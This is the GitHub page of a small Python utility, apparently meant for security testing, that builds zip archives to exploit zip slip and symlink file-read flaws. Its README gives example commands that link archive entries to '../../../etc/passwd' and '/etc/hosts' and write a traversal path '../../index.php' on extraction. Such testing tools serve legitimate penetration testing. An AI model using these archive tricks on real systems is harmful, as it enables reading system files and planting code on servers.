Skip to content

Python create zip file to test zip slip and zip link file LFI

Notifications You must be signed in to change notification settings

Esonhugh/ZipperTestingUtils

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Zipper Utils

Usage:

python zipper.py link output.zip data.pdf '../../../etc/passwd' data2.pdf '../../../../etc/hosts'
# means 
# data.pdf item is link to file ../../../etc/passwd
# data2.pdf item is link to file ../../../../etc/hosts
python zipper.py slip write_pdf.zip simple.pdf '../../index.php'
# means 
# if unziped this write_pdf.zip 
# create file ../../index.php with content simple.pdf

About

Python create zip file to test zip slip and zip link file LFI

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published